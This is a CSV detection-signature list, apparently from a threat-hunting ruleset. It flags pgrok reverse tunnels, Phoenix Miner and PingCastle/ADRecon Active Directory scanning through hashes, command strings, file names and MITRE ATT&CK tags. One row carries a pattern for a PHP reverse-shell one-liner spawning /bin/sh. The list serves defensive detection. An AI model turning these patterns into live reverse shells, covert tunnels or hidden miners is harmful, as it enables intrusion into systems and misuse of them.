"*e3bc166f9e3cd64e1eee1061f26cb80347f2cd4997971c91f3ae9cbe5cf35999*",".{0,1000}e3bc166f9e3cd64e1eee1061f26cb80347f2cd4997971c91f3ae9cbe5cf35999.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*ec0b2820e26edffdfbcb1e3e66a78dd1ba830fe37897a3a55bf4602a3e807cef*",".{0,1000}ec0b2820e26edffdfbcb1e3e66a78dd1ba830fe37897a3a55bf4602a3e807cef.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*f4e95340caf77ecf01f0b73c8d2941ff56fcbd908722a827db9bc8931ead693c*",".{0,1000}f4e95340caf77ecf01f0b73c8d2941ff56fcbd908722a827db9bc8931ead693c.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*f6c2a3ad0c251e7a5c109c6a60127c8e90506d8b71e78598c6a449c7f5c24659*",".{0,1000}f6c2a3ad0c251e7a5c109c6a60127c8e90506d8b71e78598c6a449c7f5c24659.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*fb10885853b0c5f6a0cb0bc0e5998c430d99ffcb9a5bda1fd03cefe9f3028f7a*",".{0,1000}fb10885853b0c5f6a0cb0bc0e5998c430d99ffcb9a5bda1fd03cefe9f3028f7a.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*fcc37e68c723df92d2c17ce16d8c703a90a0c2f160eeb84c4559457406bfdf57*",".{0,1000}fcc37e68c723df92d2c17ce16d8c703a90a0c2f160eeb84c4559457406bfdf57.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*ff3ae7ab29ef7a21094e07650e8cd4a4291363c2819e2dfbae34520ec762efd7*",".{0,1000}ff3ae7ab29ef7a21094e07650e8cd4a4291363c2819e2dfbae34520ec762efd7.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*http://127.0.0.1:3320/-/healthcheck*",".{0,1000}http\:\/\/127\.0\.0\.1\:3320\/\-\/healthcheck.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","1","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*jerson/tap/pgrok*",".{0,1000}jerson\/tap\/pgrok.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","1","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*pgrok http *",".{0,1000}pgrok\shttp\s.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*pgrok init --*",".{0,1000}pgrok\sinit\s\-\-.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*pgrok tcp *",".{0,1000}pgrok\stcp\s.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*pgrok/pgrok*",".{0,1000}pgrok\/pgrok.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","1","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*pgrokd.exmaple.yml*",".{0,1000}pgrokd\.exmaple\.yml.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*Reverse tunnel server started*",".{0,1000}Reverse\stunnel\sserver\sstarted.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z"
"*PhoenixMiner.exe*",".{0,1000}PhoenixMiner\.exe.{0,1000}","greyware_tool_keyword","phoenix miner","Phoenix Miner is a popular. efficient. fast. and cost-effective Ethereum miner with support for both AMD and Nvidia GPUs. It's intended to be used for legitimate cryptocurrency mining purposes.Attackers can secretly install Phoenix Miner on unsuspecting users' computers to mine cryptocurrency for themselves. This is often done by bundling the miner with other software or hiding it within malicious attachments or downloads. The computer then slow down due to the high CPU and GPU usage","T1059.001 - T1057 - T1027 - T1105 - T1064 - T1053.005 - T1089","TA0002 - TA0005 - TA0011 - TA0040 - TA0003","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*PhoenixMiner_*_Windows\*",".{0,1000}PhoenixMiner_.{0,1000}_Windows\\.{0,1000}","greyware_tool_keyword","phoenix miner","Phoenix Miner is a popular. efficient. fast. and cost-effective Ethereum miner with support for both AMD and Nvidia GPUs. It's intended to be used for legitimate cryptocurrency mining purposes.Attackers can secretly install Phoenix Miner on unsuspecting users' computers to mine cryptocurrency for themselves. This is often done by bundling the miner with other software or hiding it within malicious attachments or downloads. The computer then slow down due to the high CPU and GPU usage","T1059.001 - T1057 - T1027 - T1105 - T1064 - T1053.005 - T1089","TA0002 - TA0005 - TA0011 - TA0040 - TA0003","N/A","N/A","Phishing","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*php -r *$sock=fsockopen(*exec(*/bin/sh -i <&3 >&3 2>&3*",".{0,1000}php\s\-r\s.{0,1000}\$sock\=fsockopen\(.{0,1000}exec\(.{0,1000}\/bin\/sh\s\-i\s\<\&3\s\>\&3\s2\>\&3.{0,1000}","greyware_tool_keyword","php","php reverse shell","T1071 - T1071.004 - T1021","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"* --doNotTestSMBv1*",".{0,1000}\s\-\-doNotTestSMBv1.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"* --scanner aclcheck*",".{0,1000}\s\-\-scanner\saclcheck.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"* --scanner laps_bitlocker*",".{0,1000}\s\-\-scanner\slaps_bitlocker.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"* --scanner nullsession-trust*",".{0,1000}\s\-\-scanner\snullsession\-trust.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"* --scanner smb3querynetwork*",".{0,1000}\s\-\-scanner\ssmb3querynetwork.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"* --scanner zerologon*",".{0,1000}\s\-\-scanner\szerologon.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*/ADRecon*",".{0,1000}\/ADRecon.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/sense-of-security/ADRecon","1","1","N/A","N/A","10","10","1688","277","2020-06-15T05:23:14Z","2017-11-29T23:01:53Z"
"*/pingcastle.git*",".{0,1000}\/pingcastle\.git.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","1","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*/PingCastle.zip*",".{0,1000}\/PingCastle\.zip.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","1","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*/pingcastle/releases/download/*",".{0,1000}\/pingcastle\/releases\/download\/.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","1","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*\PingCastle.zip*",".{0,1000}\\PingCastle\.zip.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*\PingCastleAutoUpdater.*",".{0,1000}\\PingCastleAutoUpdater\..{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*>Ping Castle<*",".{0,1000}\>Ping\sCastle\<.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#productname","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*00f66ad0898ce930b1f58792baafbb71e19645ad86ef0f0827805d8fe366de91*",".{0,1000}00f66ad0898ce930b1f58792baafbb71e19645ad86ef0f0827805d8fe366de91.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*01d64306425b2e5c7a8c53c9e696719a8704dc2b011248f52fd981d7a437c1e8*",".{0,1000}01d64306425b2e5c7a8c53c9e696719a8704dc2b011248f52fd981d7a437c1e8.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*01d64306425b2e5c7a8c53c9e696719a8704dc2b011248f52fd981d7a437c1e8*",".{0,1000}01d64306425b2e5c7a8c53c9e696719a8704dc2b011248f52fd981d7a437c1e8.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*02d65d123f0bf661831666e4a9b10b1bb854b7120455488b0e28a29541b7ad8a*",".{0,1000}02d65d123f0bf661831666e4a9b10b1bb854b7120455488b0e28a29541b7ad8a.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*0747e08b55fa97ea6d21026781e1f5d2eab2a0fedd42073fd17da0e451bfe1eb*",".{0,1000}0747e08b55fa97ea6d21026781e1f5d2eab2a0fedd42073fd17da0e451bfe1eb.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*08140ddc8cd28056e9ff871e25afa4c2651115ec7829f32a7c398a1bf97c0b52*",".{0,1000}08140ddc8cd28056e9ff871e25afa4c2651115ec7829f32a7c398a1bf97c0b52.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*0b200be5c6584356e7edc5d18f1ea00f7e467295b50fd5437bf119c99792bfc7*",".{0,1000}0b200be5c6584356e7edc5d18f1ea00f7e467295b50fd5437bf119c99792bfc7.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*0E5D043A-CAA1-40C7-A616-773F347FA43F*",".{0,1000}0E5D043A\-CAA1\-40C7\-A616\-773F347FA43F.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#GUIDproject","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*15da50bc2201c1b3a8a7ffd4dbbdac655f2419a8ed47e1aad32ee4308c32d76e*",".{0,1000}15da50bc2201c1b3a8a7ffd4dbbdac655f2419a8ed47e1aad32ee4308c32d76e.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*235175349388872210b0d1d5e178bd94a850f5180d63e5c7ccd59101616da5d5*",".{0,1000}235175349388872210b0d1d5e178bd94a850f5180d63e5c7ccd59101616da5d5.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*2534aa9e6f59df7e78600419268278175681c673a6471e0f4c0b046302b30146*",".{0,1000}2534aa9e6f59df7e78600419268278175681c673a6471e0f4c0b046302b30146.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*2534aa9e6f59df7e78600419268278175681c673a6471e0f4c0b046302b30146*",".{0,1000}2534aa9e6f59df7e78600419268278175681c673a6471e0f4c0b046302b30146.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*25b3e1f0526fc55142fc27fb7c6c8cc37020edd621768c086938d24dbee2f97f*",".{0,1000}25b3e1f0526fc55142fc27fb7c6c8cc37020edd621768c086938d24dbee2f97f.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*25b3e1f0526fc55142fc27fb7c6c8cc37020edd621768c086938d24dbee2f97f*",".{0,1000}25b3e1f0526fc55142fc27fb7c6c8cc37020edd621768c086938d24dbee2f97f.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*314cb197b38516ee6dea9f5494587a21f303ca00e4894df11e4739e3bebfdc6a*",".{0,1000}314cb197b38516ee6dea9f5494587a21f303ca00e4894df11e4739e3bebfdc6a.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*36266479e235929cc0640fdf68ca395aaf851273908bb06c3b4143d8fbac2830*",".{0,1000}36266479e235929cc0640fdf68ca395aaf851273908bb06c3b4143d8fbac2830.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*38a99341371c90b6029eadb9c2a5508b3db4263a1b869948d43edb9cf04bacf5*",".{0,1000}38a99341371c90b6029eadb9c2a5508b3db4263a1b869948d43edb9cf04bacf5.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*3d114e763a2bbe22290cdadd30241c690243d4990539c891273a82ef50460940*",".{0,1000}3d114e763a2bbe22290cdadd30241c690243d4990539c891273a82ef50460940.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*3dd29906bd9c9a5db310bf6ef3d8142dbd8c5c69d6b61a91805d0fce9bf2bbda*",".{0,1000}3dd29906bd9c9a5db310bf6ef3d8142dbd8c5c69d6b61a91805d0fce9bf2bbda.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*40921f28b6e294a3511e27b2ef2026561df96ac0908f16fa90b8af5849e981f4*",".{0,1000}40921f28b6e294a3511e27b2ef2026561df96ac0908f16fa90b8af5849e981f4.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*44f46a9703c0876bf31acb1ff75b29db81ce484e8dba90ff2b13e2448ebba9e0*",".{0,1000}44f46a9703c0876bf31acb1ff75b29db81ce484e8dba90ff2b13e2448ebba9e0.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*464d8deeac82443951b7c6e10caf82f4ba0d8ee6687540cc1047404a743465b6*",".{0,1000}464d8deeac82443951b7c6e10caf82f4ba0d8ee6687540cc1047404a743465b6.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*48e04bc2e7edc9c057767539cb7c4a8b71e8196242e2cb8e461536902884692c*",".{0,1000}48e04bc2e7edc9c057767539cb7c4a8b71e8196242e2cb8e461536902884692c.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*4c4a26fc3bb0cebf08ecf55e88eb1a2bc25e11fedebc7407198e84439fe20075*",".{0,1000}4c4a26fc3bb0cebf08ecf55e88eb1a2bc25e11fedebc7407198e84439fe20075.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*4c4a26fc3bb0cebf08ecf55e88eb1a2bc25e11fedebc7407198e84439fe20075*",".{0,1000}4c4a26fc3bb0cebf08ecf55e88eb1a2bc25e11fedebc7407198e84439fe20075.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*4c4a26fc3bb0cebf08ecf55e88eb1a2bc25e11fedebc7407198e84439fe20075*",".{0,1000}4c4a26fc3bb0cebf08ecf55e88eb1a2bc25e11fedebc7407198e84439fe20075.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*52BBA3C2-A74E-4096-B65F-B88C38F92120*",".{0,1000}52BBA3C2\-A74E\-4096\-B65F\-B88C38F92120.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#GUIDproject","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*52c57ccd01efae71adb244f5867b879e14b486478681b04a1bc89d92417697d7*",".{0,1000}52c57ccd01efae71adb244f5867b879e14b486478681b04a1bc89d92417697d7.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
